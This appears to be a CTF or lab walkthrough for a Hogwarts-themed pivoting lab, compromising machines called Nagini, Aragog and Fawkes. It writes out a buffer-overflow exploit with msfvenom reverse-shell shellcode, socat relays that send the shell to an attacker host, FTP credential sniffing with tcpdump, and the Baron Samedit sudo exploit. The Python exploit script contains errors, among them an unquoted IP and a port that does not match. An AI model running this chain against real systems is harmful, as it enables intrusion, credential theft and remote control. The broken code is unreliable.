[[192.168.100.128 (Nagini Vmnet 3)]]
1. Enumerate all ports via proxychains
2. You'll see an uncommon port which is 9898. This port hosts a custom application which is vulnerable to BoF
3. Besides this, you also have anonymous access to ftp. Using this information you can enter the ftp server and download the executable being hosted by the app
```
ftp 192.168.100.129
user:
anonymous
password:
(leave as blank)

get server_hogwarts
```
4. After that you can use gdb with gef to run the app and look at how the binary behaves. You can also use the gef commands "pattern create" and "pattern offset $eip" to create a pattern to use as a bof string and obtain the offset needed to change the EIP register respectively.
```
gdb server_hogwarts

r

pattern create
```
Run in another terminal tab the following command to connect to the server hosted
```
nc 127.0.0.1 9898

(send the pattern created)
```
Go back to the gdb tool, which shows the crash, and send the following instruction:
```
pattern offset $EIP
```
5. After all this you'll have the offset to override the EIP. Now, you need the shellcode to create a reverse shell and the value needed for the EIP to go to the stack. This can be done with the following commands:
```
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.100.128 LPORT=5555 -b "\x00" -f py (Obtain the shellcode)

/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
jmp esp (to obtain the representation of that operation in hexadecimal values)

objdump -d server_hogwarts | grep "ff e4" (to find the address of a jmp to esp (8049d55 or \x55\x9d\x04\x08 in little endian))
```
6. With the shellcode, offset and jmp to esp direction you can create a python script like the following:
```python
#!/usr/bin/python3
import socket

offset = 112 (obtained by pattern_offset)
trash = b"A" * offset

stack_op = b"\x55\x9d\x04\x08"

shell_code = code_given_by_msfvenom
esp = b"\x90" * 32 + shell_code (this adds 32 NOP to make the exploit more likely to work)

final_send = trash + stack_op + esp

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((192.168.100.129, 8989))
s.send(final_send)
s.close
```
7. Now, in order to make the reverse shell to reach your machine you've to establish a socat in the Nagini machine (redirect traffic to the same port in the machine Aragog) and a socat in the Aragog machine (redirect traffic to the port 443 in the attacker machine). This can be done with the following commands
```
socat TCP-LISTEN:5555,fork TCP:10.10.0.128:5555 (run this in the Nagini to obtain the reverse shell from the 192.168.100.129 and redirect to 10.10.0.128)

socat TCP-LISTEN:5555,fork TCP:192.168.1.11:443 (run this in the Aragog to obtain the reverse shell from the 10.10.0.129 and redirect to 192.168.1.11)
```
8. Once you've established all the socats you can run the netcat server in the attacker's machine and send the python exploit via proxychains to be sure that the machine "Fawkes" in the VMnet3 recieves it.
```
nc -lvnp 443

python3 exploit.py
```
9. You'll have a reverse shell to the harry user in the docker container. You can easily root this machine because the harry user has the access to the sudo command without restrictions.
```
sudo /bin/sh
```
Horcrux 1 /root: horcrux_{NjogSGFSclkgUG90VGVyIGRFc1RyT3llZCBieSB2b2xEZU1vclQ=}
10. Now, with some enumerating we we'll see that there is a note.txt in the machine that tells us that there is a user trying to log into the ftp. We can try to obtain this attempts with tcpdump like so:
```
tcpdump -i eth0 port ftp or ftp-data
```
11. After some time waiting for the user to attempt to log in we obtain the credentials "neville:bL!Bsg3k"
12. We now can log into the machine via ssh using the previous credentials and can start the privilege escalation.
13. When enumerating with the command
```
find / \-perm /4000 2>/dev/null
```
we find that the sudo binary has SUID. We can run the following command to see the version and look for a potential CVE to crack the binary
```
sudo --version
```
Because the version is 1.8.27 it's vulnerable to "Sudo Baron Samedit".
14. Git clone the repository CVE-2021-3156 of the user worawit and change the sudo path to match the one of the victim's machine. Run the exploit and obtain root user access